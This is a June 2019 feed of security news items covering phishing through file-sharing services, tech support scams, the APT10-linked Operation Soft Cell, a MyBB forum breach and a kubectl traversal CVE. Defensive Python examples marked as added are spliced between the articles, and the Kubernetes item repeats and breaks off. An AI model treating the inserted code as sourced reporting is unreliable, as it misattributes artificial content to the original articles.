Info Security


Dramatic Increase in Abuse of File Sharing Services

Wed, 06/26/2019 - 10:55

Security researchers are warning of a “dramatic” increase in the exploitation of legitimate file sharing services to deliver malware in email-based attacks, especially OneDrive.

FireEye claimed in its latest Email Threat Report for Q1 2019 that services including WeTransfer, Dropbox, Google Drive and OneDrive are increasingly being used to host malicious and phishing files.

However, while Dropbox was the most commonly used of all the services, OneDrive is catching up fast. From hardly being used in any attacks in Q4 2018, it shot up by over 60% in the intervening months.

Hackers are using such services because links to them bypass the initial domain reputation checks made by security tools.

Detection filters are also challenged by the use of “nested emails.” With this tactic, a first email contains a second email as an attachment, which in turn contains the malicious content or URL.
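The two evasion tactics above combine naturally: a link to a legitimate file-sharing host, hidden one level down inside an attached email. As an added illustration (not code from FireEye or the original article), the following Python walks a parsed message, descends into any message/rfc822 attachment, and records links to file-sharing hosts together with the nesting depth at which they appear, so a triage rule can flag a sharing link that only exists inside a nested message. The host watch-list is derived from the services the report names, and the sample messages and placeholder URL paths are constructed for the example.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Watch-list built from the services the report names; a hypothetical starting
# point for the example, not a list published by FireEye.
FILE_SHARING_HOSTS = {
    "onedrive.live.com", "1drv.ms", "dropbox.com",
    "drive.google.com", "wetransfer.com", "we.tl",
}
URL_RE = re.compile(r"""https?://[^\s<>"']+""", re.IGNORECASE)


def is_file_sharing_host(host):
    """True for a watch-listed host or any subdomain of one."""
    host = (host or "").lower()
    return any(host == h or host.endswith("." + h) for h in FILE_SHARING_HOSTS)


def _scan(part, depth, findings):
    findings["max_depth"] = max(findings["max_depth"], depth)
    ctype = part.get_content_type()
    if ctype == "message/rfc822":
        # An e-mail attached to an e-mail: descend and keep scanning one level deeper.
        findings["nested_messages"] += 1
        for inner in part.get_payload():
            _scan(inner, depth + 1, findings)
    elif part.is_multipart():
        for sub in part.get_payload():
            _scan(sub, depth, findings)
    elif ctype in ("text/plain", "text/html"):
        for url in URL_RE.findall(part.get_content()):
            if is_file_sharing_host(urlparse(url).hostname):
                findings["file_sharing_urls"].append((depth, url))


def analyse(raw_message):
    """Parse an RFC 822 message and report nesting depth and file-sharing links."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = {"max_depth": 0, "nested_messages": 0, "file_sharing_urls": []}
    _scan(msg, 0, findings)
    # Review flag: a file-sharing link that appears only inside a nested message.
    findings["flag"] = any(depth > 0 for depth, _ in findings["file_sharing_urls"])
    return findings


# Constructed sample: an outer mail with a second mail attached whose body links
# to OneDrive. Addresses and the URL path are placeholders.
SAMPLE_NESTED = """\
From: accounts@sender.example
To: user@recipient.example
Subject: Fwd: Payment confirmation
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer-boundary"

--outer-boundary
Content-Type: text/plain; charset="utf-8"

Please see the forwarded message below.
--outer-boundary
Content-Type: message/rfc822

From: finance@sender.example
To: user@recipient.example
Subject: Invoice 2019-06
MIME-Version: 1.0
Content-Type: text/plain; charset="utf-8"

Your invoice is ready: https://1drv.ms/u/s!PLACEHOLDER-ID
--outer-boundary--
"""

# Constructed sample: a sharing link at the top level, with no nested message.
SAMPLE_TOP_LEVEL = """\
From: colleague@sender.example
To: user@recipient.example
Subject: Slides
Content-Type: text/plain; charset="utf-8"

Slides are here: https://www.dropbox.com/s/PLACEHOLDER-ID/file.pdf
"""

if __name__ == "__main__":
    for raw in (SAMPLE_NESTED, SAMPLE_TOP_LEVEL):
        print(analyse(raw))
```

The depth is kept alongside each URL on purpose: a sharing link at depth 0 is everyday business traffic, while the same link at depth 1 or deeper is the pattern described above and is worth routing to review regardless of the host's reputation score.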

FireEye also warned of a 17% increase in total phishing emails spotted over the previous quarter, with the most-spoofed brands including Microsoft, followed by OneDrive, Apple, PayPal and Amazon.

Hackers are increasingly using HTTPS in phishing attacks featuring URLs in a bid to trick users into clicking. FireEye observed a 26% quarter-on-quarter increase in the tactic, which exploits the consumer perception that HTTPS is inherently secure.

In fact, the FBI was recently forced to issue an alert warning that HTTPS and padlock icons in the address bar are not enough to prove the authenticity of sites.

It added that users should resist clicking on links in unsolicited emails.

Finally, FireEye warned that cyber-criminals are expanding their repertoire when it comes to BEC attacks.

In one version they target the payroll department with requests to change the bank details of senior executives with the hope of diverting their salary. In another, they focus on accounts payable but pretend to be trusted suppliers who are owed money, instead of the CEO/CFO.

Categories: Cyber Risk News

Recipe for Disaster as Tech Support Scammers Use Paid Search

Wed, 06/26/2019 - 09:07

Tech support gangs have been spotted using paid search to reel in unsuspecting victims looking for food-related content online, according to Malwarebytes.

The security vendor spotted scammers buying ads on Google and Bing which it said are designed to lure older netizens searching for food recipes.

“This scheme has actually been going on for months and has intensified recently, all the while keeping the same modus operandi,” it said. “Although not overly sophisticated, the threat actors behind it have been able to abuse major ad platforms and hosting providers for several months.”

As paid search entries are displayed at the top of search listings, users are more likely to click through. Doing so took them to specially created food blogs built by the scammers, complete with comments on the various articles.

“However, upon closer inspection, we can see that those sites have basically taken content from various web developer sites offering paid or free HTML templates,” said Malwarebytes.

In the right circumstances, the user is redirected to a browlock, or fake warning page, which is common in tech support scams. It checks for browser and OS and displays a relevant message claiming the user’s machine has been blocked because of a virus alert from Microsoft.

Calling the number, the white hats spoke to tech support scam ‘technicians’ who tried to sell them expensive support packages on the back of the fake AV alert. That company was listed as A2Z Cleaner Pro (AKA Coretel Communications).

Malwarebytes notified Google and Bing about the fraudulent ads and GoDaddy about the fake blogs and reiterated the importance of industry cooperation in tackling the tech support threat.

It’s unclear exactly how widespread the campaign was, but one URL shortening service used by one of the websites revealed over 50,000 hits in a single week in early May, mainly in the US.

Categories: Cyber Risk News

ICO Issues Notices After Met Police Contravenes GDPR

Wed, 06/26/2019 - 08:46

The UK’s privacy watchdog has been forced to issue the Metropolitan Police (MPS) with two enforcement notices after it failed in its obligations under the GDPR and the previous data protection regime.

The Met has not been responding promptly to citizens’ subject access requests (SARs) within the required calendar month, according to Information Commissioner’s Office (ICO) director of data protection complaints and compliance, Suzanne Gordon.

In fact, the police force was found to have more than 1100 open requests, with almost 680 of them over three months old.

“As people become more aware of their information rights, we recognise there has been a significant rise in SARs across all sectors, including to police forces and other law enforcement agencies. And we are also aware of the administrative impact of the increased workload on police forces in responding to these requests. But this should not come at a cost to people’s data rights,” she explained.

“We have … asked the MPS to make changes to its internal systems, procedures or policies, so that people are kept up to date on any delays that may affect their data protection rights and how the situation is being addressed.”

The Met claims to have a recovery plan in place and assured the ICO that the backlog of open SARs would be cleared within four months.

Police forces should log all requests, verbal and in writing, and make the public aware of any potential delays, Gordon explained. However, the 28-day clock only starts once all necessary information has been collected to establish the identity of the requester.

The police can also limit the amount of info they provide if it may prejudice an investigation or similar, she added.

The enforcement notices were served under the Data Protection Act 1998 and the Data Protection Act 2018, the latter of which is the UK’s version of the GDPR.

Categories: Cyber Risk News

Fake Ads that Lock Browsers Target Elders

Tue, 06/25/2019 - 18:56

A scam that was discovered last month that involved cyber-criminals invading Microsoft Azure Cloud Services reportedly remains ongoing. According to Malwarebytes’ threat intelligence team, the scam has continued but with a new trick: utilizing paid search results.

Instead of targeting victims through false emails claiming to be from Microsoft or Apple, scammers have been buying ads displayed on major internet portals to target an older demographic, driving traffic to decoy blogs that then redirect victims to a browser lock page, according to researchers.

“To support their scheme, the scammers have created a number of food-related blogs. The content appears to be genuine, and there are even some comments on many of the articles,” the researchers wrote. 

Though it’s been going on for months and the method of deception remains the same, researchers said the scheme has intensified recently. “Although not overly sophisticated, the threat actors behind it have been able to abuse major ad platforms and hosting providers for several months,” the researchers wrote. 

Scammers tricked users into believing their computers have been compromised via these blogs. As a result, the crooks were able to convince users that they needed expensive but ultimately useless “support packages” in order to clean up their computers. These specious offerings, not surprisingly, do next to nothing when it comes to protecting a user’s computer. 

"Tech support scams are one of the top threats affecting older folks, costing consumers millions of dollars in losses. Despite many takedowns and arrests in recent years, this industry is still very active and using the same social engineering techniques via fake browser alerts,” the Malwarebytes Threat Intelligence team told Infosecurity.

“It is important to remember that those browser lockers are not harmful in and out of themselves and that they can be closed safely. Victims that ended up calling the alleged Microsoft technicians for assistance should change their passwords, scan their machine for malware, revert any payment made, as well as monitor their bank statements closely.”

Categories: Cyber Risk News

'Dashboard Act' Would Force Orgs to Disclose Data

Tue, 06/25/2019 - 18:20

On Monday, Sens. Mark Warner (D-Va.) and Josh Hawley (R-Mo.) proposed the Designing Accounting Safeguards to Help Broader Oversight and Regulations on Data, also known as the DASHBOARD Act, which would put strict requirements on data operators, according to CNBC News.

“For years, social media companies have told consumers that their products are free to the user. But that’s not true – you are paying with your data instead of your wallet,” Warner reportedly said in a press release.

Those companies identified as data operators are defined as having more than 100 million active monthly users, which is most social media platforms and tech giants like Google. If voted into law, the new requirements would mandate that data operators “provide each user of the commercial data operator with an assessment of the economic value that the commercial data operator places on the data of that user; and in a clear and conspicuous manner.”

Data operators would also need to convey to each individual user the exact types of data that are being collected by either the company itself or a partner. “The concept of forcing large companies such as Facebook, Twitter, and Google to show their cards and actually tell people what their personal data is worth to the company is a novel one,” wrote Dennis Fisher in a June 24 blog post for Duo Security.

“Most users of those companies’ services likely have little if any idea of how much data is collected by them, let alone what the monetary value of that information is. But those companies most certainly do, as their business models depend upon it,” Fisher continued.

In response to the news, CEO and president of the Internet Association Michael Beckerman wrote, “Data helps businesses – across all industries and of all sizes and business models – provide consumers with better products and services. We are encouraged by policymaker interest in addressing consumer privacy and providing Americans with greater transparency and control over how their data is used and protected. The internet industry supports a comprehensive, economy-wide federal privacy law that covers all companies – from social media sites to local grocery stores to data brokers – to give consumers the protections and rights they need to take full control of the data they provide to companies.”

Categories: Cyber Risk News

Breach at Dominion National Likely Began in 2010

Tue, 06/25/2019 - 17:42

Dental and vision benefits insurer and administrator Dominion National announced a data security incident in which the personal information of members was potentially compromised.

“Safeguarding the privacy of your personal information is a top priority for us, and we make every effort to protect your information. Despite these efforts, Dominion National experienced a data security incident,” Dominion National president Mike Davis wrote in a company message.

The unauthorized access might have started as long ago as August 2010, according to the notice. “On April 24, 2019, through Dominion National's investigation of an internal alert and with the assistance of a leading cyber security firm, Dominion National determined that an unauthorized party may have accessed some of its computer servers. The unauthorized access may have occurred as early as August 25, 2010. Dominion National moved quickly to clean the affected servers.”

The company reports that it currently has no evidence that data was actually misused or wrongfully accessed. “However, we began mailing notification letters to potentially affected individuals on June 21, 2019, and we have established a dedicated incident response line to answer any questions.”

The data that was potentially accessed could include the enrollment and demographic information for current and former members. In addition to members of both Dominion National and Avalon Insurance, others who are affiliated with the organizations could have also had their data compromised. 

“The servers may have also contained personal information pertaining to plan producers and participating healthcare providers. The information varied by individual, but may include names in combination with addresses, email addresses, dates of birth, Social Security numbers, taxpayer identification numbers, bank account and routing numbers, member ID numbers, group numbers, and subscriber numbers,” according to the announcement.

Categories: Cyber Risk News

#DISummit19: Fraudsters Shifting Focus to Mobile Attacks

Tue, 06/25/2019 - 15:06

Speaking at the EMEA Digital Identity Summit 2019 in London, Rebekah Moody, fraud and identity market planner at LexisNexis Risk Solutions, reflected on the findings of the new ThreatMetrix EMEA Cybercrime Report.

Moody discussed how the report, based on data from attacks between January-March 2019, revealed EMEA to be one of the most mobile regions in the world, with 71% of transactions originating from a mobile device in EMEA, compared to 55% globally.

That was a key factor in driving a lower overall attack rate in the EMEA region, she added, because mobile transactions are generally “safer than desktop transactions,” with attack rates on mobile five times lower than on desktop.

“However, we have started to see some really interesting shifts and evolution in the way that fraudsters are using mobile,” Moody added, explaining that fraudsters have recently begun adapting to changing consumer behaviors and are now turning their focus to mobile attacks.

“It’s really interesting how fraudsters are using mobile as a facilitator to develop different ways to attack user accounts.”

The industry that is currently most at risk from rising mobile attacks is the media industry, Moody said, explaining that “fraudsters are likely using media as an identity-testing ‘test bed’ because it’s generally an easier target than the e-commerce or financial service industries.”

Categories: Cyber Risk News

#DISummit19: Online Fraud Becoming More Complex & Sophisticated

Tue, 06/25/2019 - 13:34

Speaking at the EMEA Digital Identity Summit 2019, Stephen Topliss, vice-president, fraud & identity at LexisNexis Risk Solutions, said that online fraud is becoming more intricate and sophisticated.

“Fraud has become much, much more complex,” he said, pointing to a particular rise in “networked fraud,” which consists of cross-border fraud, omni-channel fraud and cross-industry fraud.

“With cross-border fraud, attackers are using VPN and proxies to hide where they are originating from.

“We’re also seeing omni-channel fraud, so while in the past an attack might have focused specifically on an online banking channel, fraudsters are getting much more sophisticated and are using channels to investigate and learn more about a target or their account.”

Then there’s cross-industry fraud, Topliss added, which involves fraud attacks that first target one industry and then become stepping stones to target other industries.

There have also been recent rises in the amount of social engineering being used in fraud attacks, Topliss said. “It’s really becoming the new norm; in the financial sector, the early years of fraud really focused on third party fraud, but now there are so many layers of defense that are actually working quite well, so fraudsters have figured out that the human is the weakest link.”

Then there’s the rise in bot activity, with bots continuing to be a bigger and bigger problem within the fraud threat landscape. “It’s not just the sheer volume of them,” Topliss explained, “they are becoming more sophisticated and they’re invading traditional layers of defense. By doing that, they’re really able to do credential testing.”

Some emerging fraud opportunities have also come to light, Topliss said. “What’s interesting on the emerging fraud side of things is that we’re seeing both completely new types of fraud that are associated with new types of industries,” such as the ride-sharing industry, and fraud that targets established industries offering services “that historically were not susceptible to fraud or not targeted by fraudsters, but are suddenly becoming really, really interesting.”

Categories: Cyber Risk News

#DISummit19: Fraudsters Always React & Respond to Better Security

Tue, 06/25/2019 - 12:35

At the EMEA Digital Identity Summit 2019 in London, Chris Parker, ecrime and digital lead, fraud response and recovery at the Royal Bank of Scotland, warned that cyber-criminals will always react and respond to better security methods, and so industry collaboration is key to staying ahead of them.

“There’s an awful lot of change going on, and it’s a cat and mouse game,” he said. “We need to recognize that everything we do [to prevent cybercrime] will cause a reaction [amongst cyber-criminals].”

Parker explained that security efforts have always had to evolve and improve to try and keep data safe from fraudsters, but as they have, attackers have also continued to adapt with new tactics that circumvent any improvements that have been made.

Fraudsters have come to realize, as their infrastructures have been taken down or taken over by law enforcement and their profits affected, “that they are not always the best at doing everything, and so they have started outsourcing their efforts to find experts on the black market.

“It’s taken us to a place where we’ve increasingly got a much better visibility of what’s happening, but fraudsters have found ways in which they can really focus on the skills they need.”

For that reason, an ‘us alone’ approach to security is not enough to prevent online fraud, and “we need to work across industry with law enforcement and peers.”

There is a lot of value in sharing threat intelligence data with each other, Parker added, because “we’ve seen that by sharing that intelligence and seeing what is affecting your peers before it impacts you, and vice-versa, you gain strength. Fraudsters are doing that – fraudsters are working in groups. If they can work in a collective, then we absolutely have to work as a collective to try and stop them.”

Categories: Cyber Risk News

China Blamed for APT Attacks on Global Telcos

Tue, 06/25/2019 - 10:20

Security researchers have uncovered a major new two-year state-sponsored attack against global telcos, most likely linked to China’s Ministry of State Security (MSS).

Boston-based vendor Cybereason claimed that the group used tools and techniques associated with APT10 to obtain Call Detail Records (CDRs): metadata including source, destination, and duration of calls, physical location and device details that could help them spy on individuals.

“Having this information becomes particularly valuable when nation-state threat actors are targeting foreign intelligence agents, politicians, opposition candidates in an election, or even law enforcement,” it argued in a lengthy blog post.

“Operation Soft Cell” has been ongoing since at least 2017, targeting multiple global telcos to compromise individuals in over 30 countries worldwide.

“The attack began with a web shell running on a vulnerable, publicly-facing server, from which the attackers gathered information about the network and propagated across the network. The threat actor attempted to compromise critical assets, such as database servers, billing servers, and the active directory. As malicious activity was detected and remediated against, the threat actor stopped the attack,” Cybereason explained.

“The second wave of the attack hit several months later with similar infiltration attempts, along with a modified version of the web shell and reconnaissance activities. A game of cat and mouse between the threat actor and the defenders began, as they ceased and resumed their attack two more times in the span of a four-month period.”

Among the tools used by the attackers were: the China Chopper web shell, initially detected on an IIS server; a modified Nbtscan tool designed to find NetBIOS name servers; a modified version of mimikatz to steal credentials; fileless techniques like WMI and PsExec to move laterally; the PoisonIvy RAT; and more.

Care was taken throughout to maintain persistence and stay hidden.

“The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack,” Cybereason explained.

“Once the threat actor regains their foothold, they already have access to a high-privileged domain user account. This significantly reduces the ‘noise’ of having to use credential dumpers repeatedly, which helped them evade detection.”
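The persistence pattern Cybereason describes, a freshly created account promoted into a privileged group so that credential dumping need not be repeated, leaves a trail in Windows security auditing: event 4720 (user account created) followed shortly by 4728, 4732 or 4756 (member added to a security-enabled global, local or universal group). The Python below is an added example, not anything from the Cybereason report: it correlates those two events within a 24-hour window over constructed sample records and raises an alert per match. The privileged-group watch-list, the window length and all account, group and domain names are assumptions for the example.

```python
from datetime import datetime, timedelta

# Groups whose membership grants domain-wide privilege (assumed watch-list).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}
# 4720 = user account created; 4728/4732/4756 = member added to a
# security-enabled global/local/universal group.
GROUP_ADD_EVENTS = {4728, 4732, 4756}
WINDOW = timedelta(hours=24)


def _cn(member_name):
    """Return the CN from a distinguishedName such as 'CN=svc_x,CN=Users,DC=corp,DC=example'."""
    first = member_name.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def correlate(events):
    """Pair account creations with privileged-group additions inside WINDOW."""
    created = {}   # lower-cased account name -> (creation time, creator)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = (when, ev["SubjectUserName"])
        elif ev["EventID"] in GROUP_ADD_EVENTS and ev["TargetUserName"] in PRIVILEGED_GROUPS:
            member = _cn(ev["MemberName"]).lower()
            if member in created and when - created[member][0] <= WINDOW:
                alerts.append({
                    "account": member,
                    "group": ev["TargetUserName"],
                    "created_by": created[member][1],
                    "added_by": ev["SubjectUserName"],
                    "minutes_after_creation": (when - created[member][0]).seconds // 60,
                })
    return alerts


# Constructed sample records (field names follow the Windows security log;
# every value is made up for the example).
SAMPLE_EVENTS = [
    {"time": "2019-06-20T02:14:05", "EventID": 4720, "SubjectUserName": "jdoe",
     "TargetUserName": "svc_backup2"},
    {"time": "2019-06-20T02:19:41", "EventID": 4728, "SubjectUserName": "jdoe",
     "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_backup2,CN=Users,DC=corp,DC=example"},
    # Routine: a long-standing account added to a privileged group (no matching 4720).
    {"time": "2019-06-20T09:02:00", "EventID": 4728, "SubjectUserName": "helpdesk1",
     "TargetUserName": "Domain Admins",
     "MemberName": "CN=asmith,CN=Users,DC=corp,DC=example"},
    # Routine: a new account added to a non-privileged group.
    {"time": "2019-06-20T10:30:00", "EventID": 4720, "SubjectUserName": "helpdesk1",
     "TargetUserName": "bnguyen"},
    {"time": "2019-06-20T10:31:00", "EventID": 4732, "SubjectUserName": "helpdesk1",
     "TargetUserName": "Remote Desktop Users",
     "MemberName": "CN=bnguyen,CN=Users,DC=corp,DC=example"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Only the first pair fires: the account that was created and promoted within minutes. The other two records are the everyday noise this rule is designed to ignore, which is what makes the alert volume low enough to act on between the attack waves the report describes.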

Categories: Cyber Risk News

UK Firms Riddled With Vulnerable Open Source Software

Tue, 06/25/2019 - 09:02

There’s been a 71% increase in open source-related breaches over the past five years, with UK firms downloading on average 21,000 software components known to be vulnerable over the past 12 months, according to Sonatype.

The DevOps automation firm’s annual State of the Software Supply Chain report features global analysis from 36,000 open source project teams, 3.7 million open source releases, 12,000 commercial engineering teams and two surveys.

It claimed supply and demand of open source components is at an all-time high, with over 146 billion download requests of Java components in 2018: a 68% increase on 2017 figures.

Yet while these downloads help to speed up DevOps, they also introduce potential risk. The report found that over 51% of Java package downloads have a known security vulnerability, as do 1 in 10 Java component releases.  

The 21,000 open source components UK firms downloaded containing known software vulnerabilities amounts to nearly 9% of all downloads made last year. More worrying still: nearly a third (30%) of these were critical vulnerabilities.

The report also highlighted the number of firms using the infamous vulnerable Apache Struts component responsible for the Equifax breach which affected an estimated half of all adult Americans.

It revealed that downloads of the component actually increased by 11% in the year following the 2017 breach — amounting to 2.1m each month.

However, there was some cause for optimism: the report revealed 295 open source projects with exemplary coding practices, using automated tools to remediate known vulnerabilities quicker and update dependencies.

“We have long advised businesses that they should rely on the fewest open source component suppliers with the best track records in order to develop the highest quality and lowest risk software,” said Wayne Jackson, CEO of Sonatype. “For organizations who tame their software supply chains through better supplier choices, component selection, and use of automation, the rewards revealed in this year’s report are impressive.”

Categories: Cyber Risk News

Social Engineering Forum Suffers Major Breach

Tue, 06/25/2019 - 08:41

An online forum focused on discussion of all things social engineering has been breached, with the details of tens of thousands of account holders compromised.

Social Engineered administrator “Snow101” explained to users in a post late last week that the hackers exploited a vulnerability in open source forum software MyBB.

The admin claimed they had been forced to move the platform over to XenForo, asking users to chip in to help pay for the migration.

The breach itself happened on June 13, 2019 and compromised 89,392 accounts, according to information on HaveIBeenPwned.

It claimed the details were published on a rival hacking forum, and included around 89,000 unique email addresses linked to 55,000 users and other tables in the same database.

“The exposed data also included usernames, IP addresses, private messages and passwords stored as salted MD5 hashes,” it added.

Tripwire vice president, Tim Erlin, warned that, ironically enough, email addresses are often used in follow-on phishing raids and other social engineering attacks.

“This type of sensitive data can be used to the benefit of the attacker in a variety of ways, including identity theft and impersonation,” he added.

“MD5 is not a secure algorithm for hashing passwords. It has well-known flaws and is generally understood to be insufficient for protecting sensitive data of any kind.”
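To show what replacing salted MD5 looks like in practice, here is an added Python example (not MyBB's, XenForo's or the forum's code) of the verify-and-upgrade pattern: a legacy salted-MD5 record is checked on login and, if the password is correct, rewritten as a PBKDF2-HMAC-SHA256 record with a random salt and a high iteration count, so the weak hashes disappear as users log in rather than waiting on a forced reset. The legacy salt/password concatenation order, the two record formats and the sample password are assumptions made for the example.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # tune to your hardware; every extra iteration costs an attacker too


def legacy_md5_hash(password, salt):
    """Salted-MD5 scheme of the kind the breached forum stored. The exact
    salt/password layout is an assumption for the example, not MyBB's code."""
    return hashlib.md5((salt + password).encode("utf-8")).hexdigest()


def pbkdf2_record(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Build a self-describing record: scheme$iterations$salt$derived-key."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_and_upgrade(stored, password):
    """Check a password against either record format.

    Returns (ok, replacement_record). On a correct password against a legacy
    record, replacement_record is a fresh PBKDF2 record the caller must write
    back to the user row; otherwise it is None."""
    scheme, rest = stored.split("$", 1)
    if scheme == "md5":
        salt, digest = rest.split("$")
        ok = hmac.compare_digest(legacy_md5_hash(password, salt), digest)
        return ok, (pbkdf2_record(password) if ok else None)
    if scheme == "pbkdf2_sha256":
        iterations, salt_hex, dk_hex = rest.split("$")
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(dk.hex(), dk_hex), None
    raise ValueError("unknown hash scheme: " + scheme)


# Constructed legacy row as it might sit in the users table before migration.
LEGACY_RECORD = "md5$Zk3q$" + legacy_md5_hash("correct horse battery", "Zk3q")

if __name__ == "__main__":
    ok, upgraded = verify_and_upgrade(LEGACY_RECORD, "correct horse battery")
    print(ok, upgraded)
```

Two details matter for the defensive value: comparisons use hmac.compare_digest rather than == so timing does not leak how many bytes matched, and the record carries its own scheme and parameters, which is what lets the iteration count be raised later without another flag day.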

However, the very nature of the forum may well mean hackers have a hard time monetizing the data, Erlin claimed.

"If you were going to choose a user base that’s especially difficult to target with phishing and other social engineering-based attacks, this would certainly be near the top of the list,” he said.

Categories: Cyber Risk News

Botnet Abusing Android Debug Bridge, SSH is Back

Mon, 06/24/2019 - 17:32

A new cryptocurrency-mining botnet malware is abusing Android Debug Bridge (ADB) and SSH, according to Trend Micro.  

“This attack takes advantage of the way open ADB ports don’t have authentication by default, similar to the Satori botnet variant. This bot’s design allows it to spread from the infected host to any system that has had a previous SSH connection with the host," the researchers wrote.

"The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this malware in 21 different countries, with the highest percentage found in South Korea.”

The attack vector is one that has been abused before. Last year Juniper Threat Labs identified some of the vendors that had shipped devices with ADB enabled.

“The number of publicly vulnerable devices has declined from about 40,000 devices one year ago to about 30,000 devices today. Most of the remaining vulnerable devices are located in Korea, Taiwan, Hong Kong and China,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.

“It should be noted that some of the vulnerable devices are set-top boxes used for IPTV, not mobile phones. It is our speculation that most of the phones are, or become, vulnerable due to enabling the Android Debug Bridge during device rooting, a process which allows a locked down device to move freely between service providers.”

Because Android devices are beholden to their carriers or device manufacturers, Sam Bakken, senior product marketing manager, OneSpan, said it can be difficult for the general user to keep devices secure.

“Even if they wanted to harden their device with security updates or more secure configurations they simply can’t. The general layperson is becoming more aware of security and privacy issues as it relates to the mobile devices and apps they use,” Bakken said.

“Security is becoming a more important criterion in consumer decisions about which devices and apps they will and will not use. Savvy organizations are responding, building security into their mobile apps with technologies, such as app shielding and other in-app protections. This not only protects a developer’s intellectual property/app but also provides at least one safe haven for their users so they can rest easy knowing at least their usage of that one app is secure and protected."

Categories: Cyber Risk News

Incomplete Fix Leads to New Kubernetes Bug

Mon, 06/24/2019 - 17:11

A new high-severity Kubernetes vulnerability has been discovered, according to a security announcement on Securelists.org.

As part of the ongoing Kubernetes security audit sponsored by the Cloud Native Computing Foundation, the Kubernetes product security team announced a new high-severity vulnerability (CVE-2019-11246) that impacts kubectl, the command line interface used to run commands against Kubernetes clusters.

“Another security issue was discovered with the Kubernetes kubectl cp command that could enable a directory traversal such that a malicious container could replace or create files on a user’s workstation. The vulnerability is a client-side defect and requires user interaction to be exploited. The issue is high severity and upgrading kubectl to Kubernetes 1.12.9, 1.13.6, and 1.14.2 or later is encouraged to fix this issue,” wrote Joel Smith.

To determine whether you are vulnerable, Smith said to run kubectl version --client. Any client version other than 1.12.9, 1.13.6, 1.14.2 or later is vulnerable and should be updated.
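An added example (not from the Kubernetes announcement or the article) that applies that version rule in Python, for fleet checks where the command output is collected from many workstations: it extracts the client version from either form of kubectl version --client output (the long version.Info{...} form of the 1.14-era binaries, or the short v1.x.y form) and compares it against the first patched release of each affected minor line. The sample output strings are constructed with a placeholder commit field, and treating 1.15 and later as patched and lines before 1.12 as unpatched is an assumption drawn from the "any other version" rule above.

```python
import re
import subprocess

# First patched patch release per minor line, from the advisory quoted above.
FIRST_FIXED = {12: 9, 13: 6, 14: 2}
VERSION_RE = re.compile(r"v(\d+)\.(\d+)\.(\d+)")


def parse_client_version(output):
    """Return (major, minor, patch) from `kubectl version --client` output."""
    m = VERSION_RE.search(output)
    if not m:
        raise ValueError("no semantic version found in kubectl output")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True if this client predates the fix on its minor line."""
    major, minor, patch = version
    if major != 1:
        raise ValueError("unexpected major version %d" % major)
    if minor in FIRST_FIXED:
        return patch < FIRST_FIXED[minor]
    # Assumption: 1.15+ shipped after the fix; lines before 1.12 never received it.
    return minor < 12


def check_installed_kubectl():
    """Run the real command on this machine; None if kubectl is not on PATH."""
    try:
        out = subprocess.run(["kubectl", "version", "--client"],
                             capture_output=True, text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        return None
    version = parse_client_version(out)
    return {"version": "v%d.%d.%d" % version, "vulnerable": is_vulnerable(version)}


# Constructed sample outputs; the commit value is a placeholder, not a real hash.
SAMPLE_LONG = ('Client Version: version.Info{Major:"1", Minor:"14", GitVersion:"v1.14.1", '
               'GitCommit:"PLACEHOLDER", GitTreeState:"clean", Platform:"linux/amd64"}')
SAMPLE_SHORT = "Client Version: v1.14.2"

if __name__ == "__main__":
    for sample in (SAMPLE_LONG, SAMPLE_SHORT):
        v = parse_client_version(sample)
        print("v%d.%d.%d" % v, "vulnerable" if is_vulnerable(v) else "patched")
    print(check_installed_kubectl())
```

Because the defect is client-side, the binary to inventory is the one on each engineer's workstation and CI runner, not the cluster's server version, which is why the parser is separated from the subprocess call: the same function can be fed output gathered by whatever endpoint agent already runs on those hosts.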

“This vulnerability stems from incomplete fixes for a previously disclosed vulnerability (CVE-2019-1002101). This vulnerability is concerning because it would allow an attacker to overwrite sensitive file paths or add files that are malicious programs, which could then be leveraged to compromise significant portions of Kubernetes environments,” said Wei Lien Dang, co-founder and vice president of product at StackRox.

“This type of exploit shows how a client-side vulnerability could be used to potentially compromise production environments, especially since we have observed that best practices to mitigate against this type of threat vector are not always followed. For example, users may be running kubectl on production nodes or without appropriate role-based access control to limit access to the entire cluster or with elevated local system permissions."

Because upgrades depend on the actions of individual users, the fix can be harder to enforce, and Dang expects that this will not be the only vulnerability disclosed as a result of the security audit.

“These disclosures, along with the work by the Kubernetes product security team and broader community, will ensure that Kubernetes continues to be the most secure container orchestration platform.”

Categories: Cyber Risk News

Incomplete Fix Leads to New Kubernetes Bug

Mon, 06/24/2019 - 17:11
Incomplete Fix Leads to New Kubernetes Bug

A new high-severity Kubernetes vulnerability has been discovered, according to security announcement on Securelists.org.

As part of the ongoing Kubernetes security audit sponsored by the Cloud NativeComputing Foundation, the Kubernetes product security team announced a new high-severity vulnerability (CVE-2019-11246) that impacts kubectl, the command line interface used to run commands against Kubernetes clusters.

“Another security issue was discovered with the Kubernetes kubectl cp command that could enable a directory traversal such that a malicious container could replace or create files on a user’s workstation. The vulnerability is a client-side defect and requires user interaction to be exploited. The issue is high severity and upgrading kubectl to Kubernetes 1.12.9, 1.13.6, and 1.14.2 or later is encouraged to fix this issue,” wrote Joel Smith.

